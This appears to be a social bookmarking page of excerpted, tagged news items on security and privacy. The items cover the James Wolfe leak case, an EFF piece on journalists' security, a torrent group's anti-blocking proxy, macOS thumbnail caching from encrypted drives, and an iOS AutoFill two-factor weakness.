The former aide, James A. Wolfe, 57, was charged with lying repeatedly to investigators about his contacts with three reporters. According to the authorities, Mr. Wolfe made false statements to the F.B.I. about providing two of them with sensitive information related to the committee’s work. He denied to investigators that he ever gave classified material to journalists, the indictment said.
Mr. Wolfe, the Intelligence Committee’s director of security, was slated to appear before a federal judge on Friday in Washington. Reached on Thursday evening before his arrest, Mr. Wolfe declined to comment.
digital  security  privacy  encryption  signal  EFF  gov2.0  FBI  nytimes  leak 
8 weeks ago by rgl7194
Journalists and Digital Security: Some Thoughts on the NYT Leak Case | Electronic Frontier Foundation
The leak investigation involving a Senate staffer and a New York Times reporter raises significant issues about journalists, digital security, and the ability of journalists to protect confidential sources.
The New York Times recently revealed that the FBI had been investigating a former aide to the Senate Intelligence Committee, James Wolfe, for possibly leaking classified information to reporters. So far Wolfe has only been indicted for making false statements to investigators about his contacts with reporters.
The investigation appears to have been focused on how New York Times reporter Ali Watkins, when she worked for Buzzfeed News, learned that Russian spies had attempted to recruit a former advisor to President Trump, Carter Page.
Reading the New York Times article, three things jumped out at us.
digital  security  privacy  encryption  signal  EFF  gov2.0  FBI  nytimes  leak 
8 weeks ago by rgl7194
ETTV Launches Official Proxy to Fight ISP Blocking - TorrentFreak
When several torrent distribution groups started their own home at ETTV.tv, they moved into uncharted territory. In addition to distributing the latest releases, they were facing new problems, including ISP blockades. With a new proxy portal, ETTV is now responding to this week's Australian blockade, as well as similar efforts.
For several years, ETTV has been a household name in the torrent community.
The group, which distributes pirated TV-shows, originated at ExtraTorrent but when the site closed it built its own home.
Together with several like-minded uploaders, including ETHD, they launched ETTV.tv last fall. While the groups still distribute their work on other mainstream torrent indexes, the site’s traffic has been growing steadily.
tv  bittorrent  security  privacy 
8 weeks ago by rgl7194
Apple macOS Bug Reveals Cache of Sensitive Data from Encrypted Drives
Security researchers are warning of an almost decade-old issue with one of Apple's macOS features which was designed for users' convenience but is potentially exposing the contents of files stored on password-protected encrypted drives.
Earlier this month, security researcher Wojciech Regula from SecuRing published a blog post about the "Quick Look" feature in macOS that helps users preview photos, documents, files, or a folder without opening them.
Regula explained that the Quick Look feature generates thumbnails for each file/folder, giving users a convenient way to evaluate files before they open them.
mac  bug  security  privacy  encryption  preview 
8 weeks ago by rgl7194
macOS Breaks Your OpSec by Caching Data From Encrypted Hard Drives
Apple's macOS surreptitiously creates and caches thumbnails for images and other file types stored on password-protected / encrypted containers (hard drives, partitions), according to Wojciech Reguła and Patrick Wardle, two macOS security experts.
The problem is that these cached thumbnails are stored on non-encrypted hard drives, in a known location and can be easily retrieved by malware or forensics tools, revealing some of the content stored on encrypted containers.
mac  bug  security  privacy  encryption  preview 
8 weeks ago by rgl7194
Perverse Vulnerability from Interaction between 2-Factor Authentication and iOS AutoFill - Schneier on Security
Apple is rolling out an iOS security usability feature called Security code AutoFill. The basic idea is that the OS scans incoming SMS messages for security codes and suggests them in AutoFill, so that people can use them without having to memorize or type them.
Sounds like a really good idea, but Andreas Gutmann points out an application where this could become a vulnerability: when authenticating transactions...
This is an interesting interaction between two security systems. Security code AutoFill eliminates the need for the user to view the SMS or memorize the one-time code. Transaction authentication assumes the user read and approved the additional information in the SMS message before using the one-time code.
ios  security  privacy  autofill  2FA  bug 
8 weeks ago by rgl7194